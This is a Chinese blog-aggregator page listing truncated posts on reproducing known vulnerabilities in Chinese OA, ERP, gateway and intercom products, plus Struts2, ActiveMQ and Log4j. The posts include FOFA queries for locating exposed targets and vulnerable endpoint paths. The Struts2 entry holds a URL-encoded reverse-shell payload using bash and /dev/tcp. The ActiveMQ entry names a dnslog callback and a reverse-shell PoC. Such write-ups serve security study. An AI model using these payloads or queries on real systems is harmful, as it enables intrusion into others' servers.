E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
Nday漏洞复现
世邦通信SPON IP网络对讲广播系统rj_get_token.php 任意文件读取漏洞
资产测绘icon_hash=“-1830859634”
漏洞复现
POST/php/rj_get_token.phpHT
keepb1ue
·
2024-01-11 16:09
漏洞复现
网络
php
安全
web安全
SPON世邦 IP网络对讲广播系统 多处文件上传
漏洞复现
0x01产品简介SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。0x02漏洞概述SPON世邦IP网络对讲广播系统addscenedata.php、uploadjson.php、my_parser.php等接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。0x03复现环境FOFA:icon_hash="-183
OidBoy_G
·
2024-01-11 13:47
漏洞复现
安全
web安全
CVE-2018-8174
漏洞复现
复现环境windows7kali
漏洞复现
网络安全(阿逸)
·
2024-01-11 12:14
#
漏洞复现
安全
linux
windows
世邦通信 SPON IP网络对讲广播系统uploadjson.php任意文件上传漏洞
漏洞描述sponIP网络对讲广播系统uploadjson.php存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限资产测绘icon_hash=“-1830859634”
漏洞复现
keepb1ue
·
2024-01-11 08:15
漏洞复现
网络
php
安全
web安全
Apache ActiveMQ RCE
漏洞复现
ApacheActiveMQRCE
漏洞复现
(CNVD-2023-69477)1、漏洞版本ApacheActiveMQpingne5q0v.dnslog.cn反弹shell的poc.xmlbash-c&/
知鱼~
·
2024-01-11 07:09
web安全
apache
activemq
web安全
HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)
远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)这里写目录标题HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)漏洞概述http.sys介绍漏洞成因漏洞危害影响版本
漏洞复现
环境部署漏洞验证防护措施漏洞概述
SuperMan529
·
2024-01-11 06:20
漏洞复现
网络
网络安全
华云安攻击面发现及管理平台体验
界面简洁,要点清晰,可以清晰的看到暴露面及攻击面信息功能:资产发现:主域名发现、子域名发现、IP发现暴露面发现:端口开放性探测、端口指纹探测、网站识别、WEB组件识别风险扫描:弱口令、1day、0day、
Nday
H3h3QAQ
·
2024-01-11 05:47
网络安全
浙大恩特客户资源管理系统 CrmBasicAction.entcrm任意文件上传
资产测绘title=“欢迎使用浙大恩特客户资源管理系统”
漏洞复现
POC如下:POS
keepb1ue
·
2024-01-10 23:28
漏洞复现
网络
php
安全
web安全
世邦通信SPON IP网络对讲广播系统未授权访问
资产测绘icon_hash=“-1830859634”
漏洞复现
POST/php/getuserdata.php
keepb1ue
·
2024-01-10 23:58
漏洞复现
网络
tcp/ip
网络协议
web安全
安全
世邦通信 SPON IP网络对讲广播系统后门账户
资产测绘icon_hash=“-1830859634”
漏洞复现
代码中可以看到,可以看到有固定写死的账户密码(脑子抽了一下。
keepb1ue
·
2024-01-10 23:57
漏洞复现
网络
tcp/ip
网络协议
安全
web安全
【
漏洞复现
】锐捷RG-UAC统一上网行为管理系统信息泄露漏洞
Nx01产品简介锐捷网络成立于2000年1月,原名实达网络,2003年更名,自成立以来,一直扎根行业,深入场景进行解决方案设计和创新,并利用云计算、SDN、移动互联、大数据、物联网、AI等新技术为各行业用户提供场景化的数字解决方案,助力全行业数字化转型升级。Nx02漏洞描述锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞,攻击者可以通过审查网页源代码获取到用户账号和密码,导致管理员用户认证
晚风不及你ღ
·
2024-01-10 22:10
【漏洞复现】
web安全
【
漏洞复现
】锐捷EG易网关cli.php后台命令执行漏洞
Nx01产品简介锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。Nx02漏洞描述锐捷EG易网关cli.php存在后台命令执行漏洞,此漏洞需要权限,可搭配login.php命令执行漏洞获取登陆密码结合使用。Nx03产
晚风不及你ღ
·
2024-01-10 22:37
【漏洞复现】
web安全
宏景eHR fileDownLoad SQL注入
漏洞复现
eHRfileDownLoad接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息0x03复现环境FOFA:app="HJSOFT-HCM"0x04
漏洞复现
OidBoy_G
·
2024-01-10 22:24
漏洞复现
安全
web安全
蓝凌EIS智慧协同平台 ShowUserInfo.aspx SQL注入
漏洞复现
0x01产品简介蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。0x02漏洞概述由于蓝凌EIS智慧协同平台ShowUserInfo.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。0x03复现环境FOFA:app="La
OidBoy_G
·
2024-01-10 22:23
漏洞复现
安全
web安全
用友移动管理系统 多处文件上传
漏洞复现
0x01产品简介用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。0x02漏洞概述用友移动管理系统/maportal/appmanager/uploadIcon.do、/mobsm/common/upload等接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意
OidBoy_G
·
2024-01-10 22:53
漏洞复现
web安全
安全
仿蓝奏云网盘 /file/list SQL注入
漏洞复现
0x01产品简介仿蓝奏网盘是一种类似于百度网盘的文件存储和共享解决方案。它为用户提供了一个便捷的平台,可以上传、存储和分享各种类型的文件,方便用户在不同设备之间进行文件传输和访问。0x02漏洞概述仿蓝奏云网盘/file/list接口处存在SQL注入漏洞,登录后台的攻击者可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,
OidBoy_G
·
2024-01-10 22:22
漏洞复现
安全
web安全
[
漏洞复现
]Grav CMS任意代码执行漏洞(CVE-2022-2073)
一、漏洞介绍GravCMS可以通过Twig来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版v1.7.34以下的版本二、
漏洞复现
春秋云境.com一键梭哈开启场
free key
·
2024-01-10 18:52
漏洞复现
春秋云境靶场
安全
[
漏洞复现
]Web Based Quiz System(CVE-2022-32991)
二、
漏洞复现
春秋云境.com一键梭哈,复制粘贴直接拿下开启场景“启动原神”ok,点完鼠标我们开始ctrl+c,ctrl+v这里加',会吧,不会退学吧这里加--+知道你们懒给你们打出来
free key
·
2024-01-10 18:52
漏洞复现
春秋云境靶场
安全
[
漏洞复现
]Apache Struts2/S2-012 RCE(CVE-2013-1965)
二、
漏洞复现
春秋云境.com一键梭哈,复制粘贴直接拿下name=%25%7B%28%23cmd%3D%27bash+-i+%3E%26+%2Fdev%2Ftcp%2Fip%2Fpor
free key
·
2024-01-10 18:52
漏洞复现
春秋云境靶场
apache
struts
[
漏洞复现
]Apache_log4j2(CVE-2021-44228)
安全公告编号:CNTA-2021-00322021年12月10日,国家信息安全漏洞共享平台(CNVD)收录了ApacheLog4j2远程代码执行漏洞(CNVD-2021-95914)。攻击者利用该漏洞,可在未授权的情况下远程执行代码。目前,漏洞利用细节已公开,Apache官方已发布补丁修复该漏洞。CNVD建议受影响用户立即更新至最新版本,同时采取防范性措施避免漏洞攻击威胁。一、漏洞情况分析Apac
free key
·
2024-01-10 18:22
漏洞复现
春秋云境靶场
apache
log4j
全版本Windows RCE
漏洞复现
CVE-2023-36025
漏洞简介CVE-2023-36025是微软于11月补丁日发布的安全更新中修复WindowsSmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过WindowsDefenderSmartScreen检查及其相关提示。该漏洞的攻击复杂性较低,可创建并诱导用户点击恶意设计的Internet快捷方式文件(.URL)或指
网安老伯
·
2024-01-10 16:18
windows
web安全
安全
网络安全
网络协议
xss
ddos
【
漏洞复现
】锐捷EG易网关login.php命令注入漏洞
Nx01产品简介锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。Nx02漏洞描述锐捷EG易网关login.php存在CLI命令注入,导致管理员账号密码泄露漏洞。Nx03产品主页fofa-query:app="Rui
晚风不及你ღ
·
2024-01-10 10:05
【漏洞复现】
web安全
金和OA C6 upload_json 任意文件上传漏洞
资产测绘app=“Jinher-OA”
漏洞复现
POST/c6/KindEditor1/asp/uploa
keepb1ue
·
2024-01-09 21:35
漏洞复现
web安全
安全
世邦spon IP网络对讲广播系统任意文件上传漏洞
漏洞描述sponIP网络对讲广播系统存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限资产测绘icon_hash=“-1830859634”
漏洞复现
POST/upload
keepb1ue
·
2024-01-09 21:34
漏洞复现
网络
安全
web安全
某 E-Office v9 任意文件上传【
漏洞复现
实战】
image一、前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。本文章中的漏洞均为公开的漏洞收集,如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。二、漏洞原理本次复现漏洞为未公开漏洞CNVD-2021-49104,该漏洞是由于e-office其上传模块中用户输入部分未能妥善处理,攻击者可以构造恶意的上传数据包
H_00c8
·
2024-01-09 20:31
致远OA getAjaxDataServlet XXE
漏洞复现
(QVD-2023-30027)
0x01产品简介致远互联-OA是数字化构建企业数字化协同运营中台,面向企业各种业务场景提供一站式大数据分析解决方案的协同办公软件。0x02漏洞概述致远互联-OAgetAjaxDataServlet接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。0x03影响范围V5/G6V6.0及以上全系列版本0x04复现环境FOFA:a
OidBoy_G
·
2024-01-09 08:45
漏洞复现
安全
web安全
广联达Linkworks DataExchange.ashx XXE
漏洞复现
0x01产品简介广联达LinkWorks(也称为GlinkLink或GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。0x02漏洞概述广联达LinkWorks/GB/LK/Document/DataExchange/DataExchange.ashx接口处存
OidBoy_G
·
2024-01-09 08:52
漏洞复现
安全
web安全
金和OA C6 HomeService.asmx SQL注入
漏洞复现
0x01产品简介金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。0x02漏洞概述金和OAC6HomeService.asmx接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步
OidBoy_G
·
2024-01-09 08:52
漏洞复现
安全
web安全
广联达Linkworks GetAuthorizeKey.ashx 文件上传
漏洞复现
0x01产品简介广联达LinkWorks(也称为GlinkLink或GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。0x02漏洞概述由于广联达LinkWorks/Services/FileService/UserFiles/GetAuthorizeKey.
OidBoy_G
·
2024-01-09 08:22
漏洞复现
安全
web安全
金和OA C6 CarCardInfo.aspx SQL注入
漏洞复现
0x01产品简介金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。0x02漏洞概述金和OAC6CarCardInfo.aspx接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步
OidBoy_G
·
2024-01-09 08:48
漏洞复现
安全
web安全
全程云OA ajax.ashx接口存在SQL注入漏洞 附POC软件
1.全程云OA简介微信公众号搜索:南风
漏洞复现
文库该文章南风
漏洞复现
文库公众号首发全程云办公自动化系统也是企事业单位的内部
sublime88
·
2024-01-09 05:24
漏洞复现
ajax
sql
前端
网络
web安全
安全
金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件
1.金蝶EAS简介微信公众号搜索:南风
漏洞复现
文库该文章南风
漏洞复现
文库公众号首发金蝶EASCloud采购管理系统是专业的采购平台管理系统2.漏洞描述金蝶EAS为集团型企业提供功能全面、性能稳定、
sublime88
·
2024-01-09 05:53
漏洞复现
java
开发语言
安全
web安全
网络
网络协议
天融信TOPSEC Cookie 远程命令执行
漏洞复现
声明本文仅用于技术交流,请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。一、漏洞概述天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie处存在RCE漏洞,会导致服务器失陷。二、漏洞环境搭建
故事讲予风听
·
2024-01-08 19:43
漏洞复现
网络安全
漏洞复现
【
漏洞复现
】Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE-2023-6895
漏洞描述HikvisionIntercomBroadcastingSystem是中国海康威视(Hikvision)公司的一个对讲广播系统。HikvisionIntercomBroadcastingSystem是中国海康威视(Hikvision)公司的一个对讲广播系统。HikvisionIntercomBroadcastingSystem3.0.3_20201113_RELEASE(HIK)版本存在
丢了少年失了心1
·
2024-01-08 18:58
网络安全
web安全
渗透测试
漏洞复现
tcp/ip
网络协议
渗透测试
网络安全
【
漏洞复现
】Hikvision SPON IP网络对讲广播系统任意文件上传
漏洞描述IP网络对讲广播系统是一种基于IP网络的高效、可靠、智能的通信解决方案。它支持全双工语音通信、单呼/多呼、组呼/广播等多种通信模式,可以实现跨地域、跨网络的实时通讯。该系统具有灵活的群组管理、智能化的调度和优先级控制功能,可以满足各种场景下的紧急通讯和协作需求。同时,系统支持多种接入设备和应用程序,具有良好的可扩展性和互操作性。免责声明技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法
丢了少年失了心1
·
2024-01-08 18:23
网络安全
web安全
渗透测试
漏洞复现
网络协议
渗透测试
漏洞复现
网络安全
CVE-2021-21220 Chrome远程代码执行
漏洞复现
0x00简介GoogleChrome浏览器是一款由Google公司开发的网页浏览器,该浏览器基于其他开源软件撰写,包括WebKit,目标是提升稳定性、速度和安全性,并创造出简单且有效率的使用者界面。通过CVE-2021-21220漏洞,受害者通过未开沙箱机制的Chrome浏览器打开攻击者置入恶意代码的网页后就会执行攻击者想要执行的任意代码。微信作为腾讯公司发布的一款聊天工具。通过PC端微信用户可以
m0_56642842
·
2024-01-08 16:01
黑客
漏洞复现
网络安全
深度学习
一本真正入门级别的Java代码安全审计专业技术图书上架啦!
在“攻”方面,传统的通过扫描器扫描站点或利用
NDay
来渗透的方式已经受到了很大的制约,现在及未来的典型渗透测试流程是:确定站点指纹→通过旁站扫描备份或开源程序得到源代码→代码审计→利用审计出来的漏洞制定修订措施
人邮异步社区
·
2024-01-08 11:27
代码安全
代码审计
java
OWASP
编程语言
【
漏洞复现
】海康威视iVMS综合安防系统任意文件上传
漏洞复现
(在野0day)
声明本篇文章仅用于
漏洞复现
与技术研究,请勿利用文章内的相关技术从事非法测试,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
李火火安全阁
·
2024-01-08 00:08
漏洞复现
海康威视iVMS
Supabase 后端服务平台 SQL注入
漏洞复现
0x01产品简介Supabase是一个开源的Firebase替代品,以BaaS的形式向各种应用程序提供了一系列的后端功能,可以帮助开发者更快地构建产品。对于想快速实现一个产品而言,如果使用传统开发,又要兼顾前端开发,同时又要花费时间构建后端服务。Supabase能够让开发人员可以专注于前端开发,而无需花费大量时间和精力来构建和维护后端基础设施。Supbase产品包括Postgres数据库和身份验证
OidBoy_G
·
2024-01-08 00:07
漏洞复现
sql
数据库
web安全
安全
海康威视安全接入网关 任意文件读取
漏洞复现
0x01产品简介海康威视安全接入网关是一种网络安全产品,旨在提供安全、可靠的远程访问和连接解决方案.0x02漏洞概述海康威视安全接入网关使用Jquery-1.7.2,该版本存在任意文件读取漏洞,可获取服务器内部敏感信息泄露(安博通应用网关也存在此漏洞)0x03复现环境FOFA:(body="webui/js/jquerylib/jquery-1.7.2.min.js"&&product="ABT-
OidBoy_G
·
2024-01-08 00:36
漏洞复现
安全
web安全
网络
Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE-2023-6895 附POC软件
1.HikvisionSPONIP网络对讲广播系统简介微信公众号搜索:南风
漏洞复现
文库该文章南风
漏洞复现
文库公众号首发HikvisionIntercomBroadcastingSystem是中国海
sublime88
·
2024-01-07 23:36
漏洞复现
网络
tcp/ip
网络协议
任我行CRM系统SmsDataList接口存在SQL注入漏洞 附POC软件
1.任我行CRM系统SmsDataList接口简介微信公众号搜索:南风
漏洞复现
文库该文章南风
漏洞复现
文库公众号首
sublime88
·
2024-01-07 23:36
漏洞复现
安全
web安全
安全性测试
用友NC Cloud soapFormat.ajax接口存在XXE 附POC软件
1.用友NCCloudsoapFormat.ajax接口简介微信公众号搜索:南风
漏洞复现
文库该文章南风
漏洞复现
sublime88
·
2024-01-07 23:35
漏洞复现
okhttp
安全
web安全
网络
智邦国际ERP GetPersonalSealData.ashx接口存在SQL注入漏洞 附POC软件
1.智邦国际ERP简介微信公众号搜索:南风
漏洞复现
文库该文章南风
漏洞复现
文库公众号首发智
sublime88
·
2024-01-07 23:32
漏洞复现
sql
数据库
漏洞复现
--用友移动管理平台uploadIcon任意文件上传
免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责一:漏洞描述用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵
芝士土包鼠
·
2024-01-07 21:21
漏洞复现
网络安全
web安全
安全
漏洞复现
--Apache OFBiz groovy RCE(CVE-2023-51467)
免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责一:漏洞描述ApacheOFBiz(ApacheOpenForBusiness)是一个开源的企业资源规划(ERP)系
芝士土包鼠
·
2024-01-07 21:51
漏洞复现
安全
网络安全
web安全
漏洞复现
--天融信TOPSEC两处远程命令执行
免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责一:漏洞描述天融信(TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和
芝士土包鼠
·
2024-01-07 21:48
漏洞复现
网络安全
web安全
安全
用友NC word.docx 任意文件读取
漏洞复现
0x01产品简介用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。0x02漏洞概述用友NC系统word.docx等接口存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。0x03复现环境FOFA:body="UCl
OidBoy_G
·
2024-01-07 16:38
漏洞复现
安全
web安全
用友 NC IUpdateService XXE
漏洞复现
0x01产品简介用友NC是用友网络科技股份有限公司开发的一款大型企业数字化平台。0x02漏洞概述用友NCIUpdateService接口存在XML实体注入漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,读取系统内部文件,使系统处于极不安全状态。0x03复现环境FOFA:app="用友-UFIDA-NC"0x04漏洞概述PoCGET/uapws/service/nc.uap.oba.updat
OidBoy_G
·
2024-01-07 03:35
漏洞复现
安全
web安全
金和OA C6 MailTemplates.aspx SQL注入
漏洞复现
0x01产品简介金和OA协同办公管理系统软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。0x02漏洞概述金和OAC6MailTemplates.aspx接口处存在SQL注入漏洞,攻击者除了
OidBoy_G
·
2024-01-07 03:35
漏洞复现
安全
web安全
上一页
5
6
7
8
9
10
11
12
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他